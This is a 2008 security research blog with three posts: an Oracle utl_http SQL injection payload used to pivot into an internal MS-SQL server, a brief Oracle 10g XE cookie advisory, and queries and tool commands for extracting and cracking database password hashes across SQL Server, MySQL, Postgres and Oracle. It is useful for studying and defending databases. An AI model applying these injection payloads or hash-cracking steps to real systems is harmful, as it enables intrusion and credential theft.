Exploiting Internal Networks with Oracle UTL_HTTP package

April 22, 2008 Research | Comments (0) sid @ 9:36 pm

SQL Injection Oracle + MS-SQL

Oracle's utl_http.request() function has been referred a number of times to carry out sql injection. It is generally used for the purpose of resolving names, so that an attacker could receive the output of his SQL query over DNS channel.

However, this function can also be used to make a legitimate http connection to internal network. Thus, if this function is available, a sql injection in oracle could also serve as a http proxy for internal network.

In the screenshot, i have exploited a sql injection in MS-SQL server via a sql injection in Oracle.

e.g http://192.168.1.1/oracle.php?id=1%20union%20all%20

select%20utl_http.request('http://192.168.1.2/MSSQL/?p=1/**/union/**/all/*

*/select/**/null,@@version,null')%20from%20dual 

Oracle 10g Express Edition Cookie’s issue

April 20, 2008 Advisories, Research | Comments (0) sid @ 10:08 am

Oracle 10g Express Edition does not invalidate the cookie www_flow_user2 on server when the user logs off.

Tested in version:- Oracle 10g Express edition 10.2.0.1.0, other versions may also be vulnerable.

Patch:- Oracle CPU April 2008

Database Password Hashes Cracking

April 15, 2008 Research | Comments (1) sid @ 8:42 am

SQL Server 2000:-

SELECT password from master.dbo.sysxlogins where name='sa' 

0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341

2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0×0100- constant header

34767D5C- salt

0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash

2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash

crack the upper case hash in 'cain and abel' and then work the case sentive hash

 

SQL server 2005:-

SELECT password_hash FROM sys.sql_logins where name='sa'

0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F

0×0100- constant header

993BF231-salt

5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash

crack case sensitive hash in cain, try brute force and dictionary based attacks.

 

update:- following bernardo's comments:-

use function fn_varbintohexstr() to cast password in a hex string. 

e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins 

 

MYSQL:-

In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

 

*mysql  < 4.1

 

mysql> SELECT PASSWORD('mypass');

+——————–+

| PASSWORD('mypass') |

+——————–+

| 6f8c114b58f2ce9e   |

+——————–+

 

*mysql >=4.1

 

mysql> SELECT PASSWORD('mypass');

+——————————————-+

| PASSWORD('mypass')                        |

+——————————————-+

| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |

+——————————————-+

Select user, password from mysql.user

The hashes can be cracked in 'cain and abel' 

 

Postgres:-

Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called "postgres" or "pgsql")

select usename, passwd from pg_shadow;

     usename      |  passwd                

——————+————————————- 

testuser            | md5fabb6d7172aadfda4753bf0507ed4396

use mdcrack to crack these hashes:-

$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-

select name, password, spare4 from sys.user$

hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g

More on Oracle later, i am a bit bored…. 

References/Copied from:-

http://hkashfi.blogspot.com/2007/08/breaking-sql-server-2005-hashes.html

http://dev.mysql.com/doc/refman/5.0/en/password-hashing.html

http://pentestmonkey.net/blog/cracking-postgres-hashes/

http://freeworld.thc.org/thc-orakelcrackert11g/